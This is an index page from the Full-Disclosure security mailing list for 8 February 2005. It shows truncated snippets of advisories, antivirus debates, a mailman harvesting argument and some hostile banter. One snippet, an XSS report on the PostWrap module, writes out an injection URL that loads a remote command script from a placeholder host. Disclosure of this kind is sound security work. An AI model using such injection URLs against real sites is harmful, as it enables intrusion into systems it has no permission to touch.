RE: [Full-Disclosure] Administrivia: Goodbye

2005-02-08 Thread Aditya Deshmukh
I'm officially retiring from everything and no longer involved Len Rose Good Riddance. J.A. Terranson [EMAIL PROTECTED] Good Riddance. Will be when u get off this list not len. But sadly it's the opposite way around so we all will be missing u len -aditya

RE: [Full-Disclosure] state of homograph attacks

2005-02-08 Thread Aditya Deshmukh
The actual bug referenced by Gerald is that if you use about:config to set it, it *works* without having to restart, but at the next restart of the browser, the setting no longer works... Isnt there a way to make this survive browser restarts ?

RE: [Full-Disclosure] Multiple AV Vendors ignoring tar.gz archives

2005-02-08 Thread Barrie Dempster
On Tue, 2005-02-08 at 11:26 +1300, Nick FitzGerald wrote: Stuart Fox to me: Isn't this similar to what MS do in Windows 2003/XP SP2 with Software Restriction Policies? Executables are only allowed to run provided they fit a prespecified pattern i.e. name (not very useful), signed or not,

RE: [Full-Disclosure] Multiple AV Vendors ignoring tar.gz archives

2005-02-08 Thread Nick FitzGerald
Barrie Dempster to me: Yes, but it has to be much more thoroughly implemented. Absolutely, There are a few minor implementations of this but it's something that directory and management systems could incorporate. As most OS's have an executable permission, it would be an idea to have

[Full-Disclosure] SafeNet SoftRemote VPN Client Issue: Clear-text password stored in memory

2005-02-08 Thread Roy Hills
SafeNet SoftRemote VPN Client Issue: Clear-text password stored in memory Summary: NTA Monitor have discovered a password disclosure issue in the SafeNet SoftRemote VPN client: The SoftRemote client stores the password in an obfuscated form in the Windows registry, but it also stores the

[Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread Dave Korn
Bernhard Kuemel [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi! Tons of email addresses from mailman mailing lists are vulnerable to be collected by spammers. They are protected by obfuscation ([EMAIL PROTECTED] - user at

Re: [Full-Disclosure] Multiple AV Vendors ignoringtar.gz archives (fwd)

2005-02-08 Thread Paul Laudanski
Folks, here is a summary of a discussion with Mark at Eset for NOD32 about .tar.bz2. So what do you folks think, how many people would like to see this capability? -- Regards, Paul Laudanski - Computer Cops, LLC. CastleCops(SM) - http://castlecops.com http://cuddlesnkisses.com |

[Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap

2005-02-08 Thread hio hou
Bonjour, Albania Security Clan vient de découvrir une vulnebalirité de type XSS dans le module PostWrap le problem est au niveu de /index.php?module=PostWrappage=http://hostename.com/HACK/asc/ascmd.txt c n'est po une php injection parce que c'est protégé mais on peux injecter des comandes XSS, du

Re: [Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread James Longstreet
On Tue, 8 Feb 2005, Dave Korn wrote: Why? You hoping to sell it to spammers? Obfuscating *works*; if YOU break it, that makes YOU a spamming motherfucker. Why don't you go fuck yourself instead? The name of the list is Full-Disclosure. This is like saying gets() works, if you show that

Re: [Full-Disclosure] Multiple AV Vendors ignoring tar.gz archives

2005-02-08 Thread bkfsec
James Eaton-Lee wrote: First off, thanks for the e-mail! It was well argued, and you obviously took a lot of time on it; this is much appreciated. With that, let the reply begin.. Thanks. Nah - it took me like 5 minutes to write. Not a lot of time at all. :) but the devil is in the detail,

[Full-Disclosure] Integer overflow and arbitrary files deletion in RealArcade 1.2.0.994

2005-02-08 Thread Luigi Auriemma
### Luigi Auriemma Application: RealArcade http://www.realarcade.com Versions: = 1.2.0.994 Platforms:Windows Bugs: A] integer overflow in RGS files B]

[Full-Disclosure] GREENAPPLE Release

2005-02-08 Thread Dave Aitel
Reference: http://lists.virus.org/dailydave-0411/msg00028.html This is a quick announcement that the recent Microsoft patch (MS-05- has fixed a vulnerability I found a while back in SMB. (http://www.microsoft.com/technet/security/bulletin/ms05-011.mspx) More information on this vulnerability is

[Full-Disclosure] iDEFENSE Security Advisory 02.08.05: IBM AIX auditselect Local Format String Vulnerability

2005-02-08 Thread idlabs-advisories
IBM AIX auditselect Local Format String Vulnerability iDEFENSE Security Advisory 02.08.05 www.idefense.com/application/poi/display?id=193type=vulnerabilities February 08, 2005 I. BACKGROUND The auditselect program is a setuid root application, installed by default under multiple versions of

[Full-Disclosure] MDKSA-2005:031 - Updated perl packages fix multiple vulnerabilities

2005-02-08 Thread Mandrakelinux Security Team
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandrakelinux Security Update Advisory ___ Package name: perl Advisory ID:

Re: [Full-Disclosure] Re: mailman email harvester

2005-02-08 Thread J b
Take a look at the date of that report. That it's from almost TWO YEARS ago! The spammer/anti-spammer arms race began a long time ago, and will only get worse. I've seen numerous harvesters with randomized User-Agent strings crawling a mail archive of mine, even though all output is filtered

Re: [Full-Disclosure] Microsoft to buy Sybari AV company

2005-02-08 Thread Danny
On Tue, 8 Feb 2005 17:51:16 +0100 (CET), Feher Tamas [EMAIL PROTECTED] wrote: http://news.zdnet.com/2100-1009_22-5567529.html GeCad RAV, GIANT and now Sybari Antivirus. Microsoft swallows smaller anti-malware firms one by one. When the last one is gone, MS will probably eat the larger ones,

[Full-Disclosure] Finjan Security Advisory: Microsoft Office XP Remote Buffer Overflow Vulnerability

2005-02-08 Thread Rafel Ivgi
Finjan Security Advisory Microsoft Office XP Remote Buffer Overflow Vulnerability Introduction Finjan has discovered a new vulnerability in Microsoft Word XP that would allow a hacker to launch a buffer overflow attack. This attack could occur when a user opened a Word document using Internet

Re: [Full-Disclosure] Microsoft to buy Sybari AV company

2005-02-08 Thread Valdis . Kletnieks
On Tue, 08 Feb 2005 19:27:54 EST, Danny said: Further, if Microsoft thinks acquisitions will solve all of their problems, why don't they acquire a company with programmers that have some clue about security and it's place in software that is plugged into a network. They don't think

[Full-Disclosure] netdde during update

2005-02-08 Thread morning_wood
while netdde is not started by default. I did just notice netdde does run during Windows update... this would allow a window of opportunity to exploit the service. a worm using the netdde exploit could take advantage of this before the user fully updates. just noticing, Donnie Werner

[Full-Disclosure] Re: Local *.php file inclusion and full path disclosure in BXCP = 0.2.9.7

2005-02-08 Thread Majest
Author: [OfB|FistFucker] - (Majest) Contact: http://www.ofb-clan.de/ I've reported the vulnerability to the programmer of BXCP. He released a patch for 'index.php' and a new version (0.2.9.8). You can get it from: http://www.bxcp.com/ - Original Message - From: Majest [EMAIL

[Full-Disclosure] HELP: mailing list

2005-02-08 Thread Majest
lol *^_^* How do I reply on a message in this mailing list? *shame-lame* -.- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html